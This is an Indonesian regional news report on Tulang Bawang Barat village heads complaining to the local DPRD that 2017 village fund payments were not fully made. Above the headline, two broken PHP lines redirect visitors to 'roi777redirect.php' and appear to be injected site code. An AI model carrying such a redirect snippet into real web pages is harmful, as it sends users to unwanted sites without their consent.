header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); ADD Tubaba 2017 Tidak Cair, DPRD : Ini Tamparan Telak Buat Kami -
ADD Tubaba 2017 Tidak Cair,  DPRD : Ini Tamparan Telak Buat Kami

TRANSLAMPUNG.COM–PANARAGAN.
Kepala Tiyuh kartasari, Kecamatan Tulangbawang Udik Kabupaten Tulangbawang Barat (Tubaba) ‎Lampung, Turunan Mega. Meminta secara tegas Pemkab Tubaba dapat melunasi pembayaran uang Anggaran Dana Desa (ADD) 2017 terhadap seluruh Tiyuh se-Kabupaten.

‎hal tersebut diungkapkannya pada acara penyerapan aspirasi masyarakat (Reses) oleh lintas komisi DPRD Kabupaten setempat, dikecamatan Tulangbawang Udik dan Tumijajar pada (30/3/2018) sekira pukul 14:16 Wib.

menurut Turunan mega saat dimintai tanggapan pada kegiatan reses tersebut mengatakan. ‎Pihaknya meminta terhadap Pemkab Tubaba upaya proses penggunaan dana desa pihak BPMPT, Adwil dan Kabag hukum dapat singkron, sebab selama ini cukup membingungkan pemerintah Tiyuh.

” selama ini yang kami keluhkan birokrasi pelaporan Dana Desa yang menurut tiga OPD terkait, tidak pernah singkron dan cukup membingungkan.” Kata nya saat dikutip Trans lampung.com.

‎lanjut dia, terkait pembangunan yang dilakukan oleh Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) di Tiyuh kartasari akhir ini masih sangat minim pembangunan khusunya insprastruktur. Selain itu, dia juga meminta terhadap satudiantara anggota DPRD fraski Nasdem Gunawan agung kuncoro, dapat mempertanyakan terkait ADD seluruh Tiyuh se-Tubaba pada 2017 lalu tidak dibayarkan seluruhnya.

” untuk menjaga Marwah Bupati Tubaba Umar ahmad, mohon dengan DPRD dapat mempertanyakan hal ini kepihak Pemda, ‎sebab saya yakin Bupati tidak mengetahui jika kronologis ADD seperti ini,  selama 2017 lalu masing-masing Tiyuh (Desa) sekedar menerima pembayaran ADD untuk siltap sebesar Rp 100 juta saja.” tegasnya.

menaggapii hal itu Gunawan agung kuncoro, selaku anggota DPRD dapi II berjanji terhadap seluruh kepala Tiyuh akan menyampaikan hal tersebut kepada Dinas terkait, pastinya jika apa yang disampaikan oleh kepala Tiyuh benar adanya maka itu suatu tamparan telak bagi kami DPRD. ‎(Dirman)

News Reporter